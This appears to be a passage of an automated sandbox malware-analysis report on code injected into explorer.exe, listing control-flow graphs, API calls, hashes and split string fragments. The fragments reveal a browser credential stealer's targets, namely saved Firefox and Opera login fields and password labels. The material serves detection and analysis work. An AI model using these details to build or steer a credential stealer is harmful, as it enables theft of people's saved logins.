                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                                        • String ID: .dll$el32$kern
                                                                                                                                                                                        • API String ID: 1964310414-1222553051
                                                                                                                                                                                        • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                        • Instruction ID: b20e0026ab99702d2f887ecaab7f63776d5b7a9e56971813dc181e57db69595d
                                                                                                                                                                                        • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                        • Instruction Fuzzy Hash: C8412D70918A088FDF94EFA8D8987AD77E0FF98300F04416AD84EDB295DF749A45CB85

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 399 61085b2-61085ea 400 610860a-610862b socket 399->400 401 61085ec-6108604 call 610b942 399->401 401->400
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: socket
                                                                                                                                                                                        • String ID: sock
                                                                                                                                                                                        • API String ID: 98920635-2415254727
                                                                                                                                                                                        • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                        • Instruction ID: 216e27861448cfcb5eb5391f5c3e186e6d4f46eeb6decb9b1de5657eea635dfe
                                                                                                                                                                                        • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                        • Instruction Fuzzy Hash: B30121706186188FCB84EF5CD048B55BBE0FB59314F1545ADE45ECB266C7B4C9818B86

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 416 61002dd-6100320 call 610b942 419 6100326 416->419 420 61003fa-610040e 416->420 421 6100328-6100339 SleepEx 419->421 421->421 422 610033b-6100341 421->422 423 6100343-6100349 422->423 424 610034b-6100352 422->424 423->424 425 610035c-610036a call 610af12 423->425 426 6100370-6100376 424->426 427 6100354-610035a 424->427 425->426 429 61003b7-61003bd 426->429 430 6100378-610037e 426->430 427->425 427->426 431 61003d4-61003db 429->431 432 61003bf-61003cf call 6100e72 429->432 430->429 434 6100380-610038a 430->434 431->421 436 61003e1-61003f5 call 61000f2 431->436 432->431 434->429 437 610038c-61003b1 call 6101432 434->437 436->421 437->429
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                                        • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                        • Instruction ID: 3f755aa39c3c3d91da1a5d6e41ed31adccd0ba28a77c0d76a2e9feb3e6499fc7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                        • Instruction Fuzzy Hash: DA316D74914B09DFEFA5EF2980487A5B7A0FB9C302F44427EC92DCA146CBB49050CF91

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 452 6100412-6100446 call 610b942 455 6100473-610047d 452->455 456 6100448-6100472 call 610dc9e CreateThread 452->456
                                                                                                                                                                                        APIs
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638758536.0000000006070000.00000040.80000000.00040000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_6070000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                        • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                        • Instruction ID: 97f435131263aee8a0afa8e2ddede3a6777ec7b20e3350919c587d834ab76ea2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8CF0C230668A484FEBC8EF2CD84562AF3D0FBE8215F44063EA54DC3264DB69C5818716
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                        • API String ID: 0-393284711
                                                                                                                                                                                        • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                        • Instruction ID: fdacb4a8c8681dab76bd92f06df520e31676e055f546368e3274cd3b1dda5f99
                                                                                                                                                                                        • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AE18B78528F588FCB64EF68C4847AAB7E1FB58301F804A2E949FC7241DF34A545CB86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                        • API String ID: 0-393284711
                                                                                                                                                                                        • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                        • Instruction ID: a37f7f75244c99c2c7a52346cba4234b6271dedaa7c4bc47502c362a45a8d4c3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                        • Instruction Fuzzy Hash: CBE16C74618F488FC764EF68C8887EAB7E1FB58300F804A6E95ABC7255DF34A501CB85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                        • API String ID: 0-2916316912
                                                                                                                                                                                        • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                        • Instruction ID: c89042ac7c1fef650eef2a9864ada8e503536eb46c6b007330caddff5621f5da
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                        • Instruction Fuzzy Hash: 46B18934518B488FDB59EF68C485AEEB7F2FF98300F50451ED49AC7261EF70A4498B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                        • API String ID: 0-2916316912
                                                                                                                                                                                        • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                        • Instruction ID: 0c542818365de72526568183fb04ef7451a2292a947f598824715e6a706ed4fd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                        • Instruction Fuzzy Hash: 53B18D30618B488EDB55EF68C899AEEBBF1FF98300F50452ED49AC7251EF749405CB86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                        • API String ID: 0-1539916866
                                                                                                                                                                                        • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                        • Instruction ID: 08a76e3e08ffb5dcf921aabb525b9630250c011215a77b798d55f087c8c00958
                                                                                                                                                                                        • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                        • Instruction Fuzzy Hash: F0419074A18B088FDB18DF88A4897AD7BE6FB48704F00025ED409D7285DBB59D45CBD6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                        • API String ID: 0-1539916866
                                                                                                                                                                                        • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                        • Instruction ID: e69f8a4730f700fb1533e39178832b0c40aa31f43d4509b61ca96110076057e4
                                                                                                                                                                                        • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                        • Instruction Fuzzy Hash: BC419E70A1CB08CFEB14DF89A8496AD7BE2FB48700F00025ED849D3245DBB99D458BD6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                        • API String ID: 0-355182820
                                                                                                                                                                                        • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                        • Instruction ID: b0108c35afcf68fff1bb3f4bba3f2f977db64a607404cb4e70b4e4423036ff1a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                        • Instruction Fuzzy Hash: C5C15B78218B198FC758EF28D485AAAF3E5FB94304F40472E949EC7250DF30E559CB86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                        • API String ID: 0-355182820
                                                                                                                                                                                        • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                        • Instruction ID: bb02ee1488f4150e309798aacd13707ee00acb765da50792c61620f2b61bac05
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                        • Instruction Fuzzy Hash: BAC16A70618B098BC758EF28C899ADAF7E1FB98304F40466E949EC7250DF74E615CB86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                        • API String ID: 0-97273177
                                                                                                                                                                                        • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                        • Instruction ID: 45482f6c200e7db46b56f1cdbfc0efeb176419dd9514bc4457472607cfc53752
                                                                                                                                                                                        • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2351F6385587588FD71DDF18C8813AAB7E5FB84304F50192EE8CBC7241DBB4954ACB82
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                        • API String ID: 0-97273177
                                                                                                                                                                                        • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                        • Instruction ID: eb79c9631c84396171af019ecec79389b796953ba020432b0b9c6ea84997b84b
                                                                                                                                                                                        • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4251D43161C7488FD719DF18D9856AABBE5FB85300F501A7EE8CBC7241DBB89506CB82
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                        • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                        • Instruction ID: 8bfc6a029632407a24b87de01c9131c2ca923f51692b0b8b7e946af6b75a3f14
                                                                                                                                                                                        • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                        • Instruction Fuzzy Hash: ADC1B178618A294FC758EF68D495AAAF3E6FF98304F804329884ED7251DF30D945CBC6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                        • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                        • Instruction ID: d492de02283fc53c86cedcd58a12425c201eb38e7973dd303f9912a4d31911c1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AC1A278618A294FC758EF68D495AAAF3E6FF98304F804329884ED7251DF30D945CBC6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                        • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                        • Instruction ID: 8edda5a8d1a3cce415637b5eccaad3c31c480faf9e68b3c4ff0bc9438f2b4a70
                                                                                                                                                                                        • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                        • Instruction Fuzzy Hash: 05C18F70B18A198FC758EF68D899AEAB7E1FB94300F94436D844EC7251DF74EA01C786
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                        • API String ID: 0-639201278
                                                                                                                                                                                        • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                        • Instruction ID: 7a084151f8cae346187998e026da24263cd9e9ae95a74eb80e001372e6a25d30
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FC18070B18A198FC758EF68D899AEAB7E1FB94300F94436D844EC7251DF74EA01C786
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                        • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                        • Instruction ID: 88eeabf28f6d46e870b5363aa14ca502e26de7abd7ea24de5866b950b8a3f5db
                                                                                                                                                                                        • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                        • Instruction Fuzzy Hash: 09A1B0746187588FDB18EF6894447EEB7E2FF98300F40462ED48AD7291EF7095898B85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                        • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                        • Instruction ID: 558e148f3258c680268324ff0122d783ee79970dd2d421cba6f8f28148e5e75f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                        • Instruction Fuzzy Hash: 38A1C270A187488FDB28EF68D448BEEBBE1FF88301F40466DE48AD7251DF7485468789
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                        • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                        • Instruction ID: 7fb19f9d51b2fe08a94ee628d51cb8c5c93c69e4ab01b0f9cc2f386b2d84bdd8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B9190746187588FDB18EFA8D444BEEB7E2FB98300F40462ED44AD7291EF748589CB85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                        • API String ID: 0-2058692283
                                                                                                                                                                                        • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                        • Instruction ID: d9853b83a4779b667faee6bfa89361587a9fe217f78d60029d28dbdc0fe94868
                                                                                                                                                                                        • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                        • Instruction Fuzzy Hash: B9919270A187488BDB28EFA8D448BEEBBE1FF98301F40466DE48AD7251DF7485458785
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $.$e$n$v
                                                                                                                                                                                        • API String ID: 0-1849617553
                                                                                                                                                                                        • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                        • Instruction ID: 0897c36ccd35613744443b2a328fcfe8fd6b45bf8f7e28ed5ec1cb6db8f2ac26
                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                        • Instruction Fuzzy Hash: E071A439618B488FD758EF68D4847AAB7F5FF58304F00062FD44AC7261EB71E9498B86
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: $.$e$n$v
                                                                                                                                                                                        • API String ID: 0-1849617553
                                                                                                                                                                                        • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                        • Instruction ID: af900ba329a1c19a7ccfd6e5431cb1e6574a6bfc272a8d77b6b218e41bbeb343
                                                                                                                                                                                        • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B71A031A18B498FD758EFA8C4886EAB7F1FF98305F00063ED44AC7261EB75D9458B85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.637989172.0000000002800000.00000040.00000001.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_2800000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                        • API String ID: 0-1970020201
                                                                                                                                                                                        • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                        • Instruction ID: 3d2958dff0c7cbab2a1fe608b1db8d73ce8ae4ea60f27d3dced846ba49d599e9
                                                                                                                                                                                        • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 40515DB4914B4C8FDB54EFA8D0446EEB7F1FF58301F40462E949AE7214EF3095858B8A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000017.00000002.638735635.0000000005EE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_23_2_5ee0000_explorer.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 2.dl$dll$l32.$ole3$shel
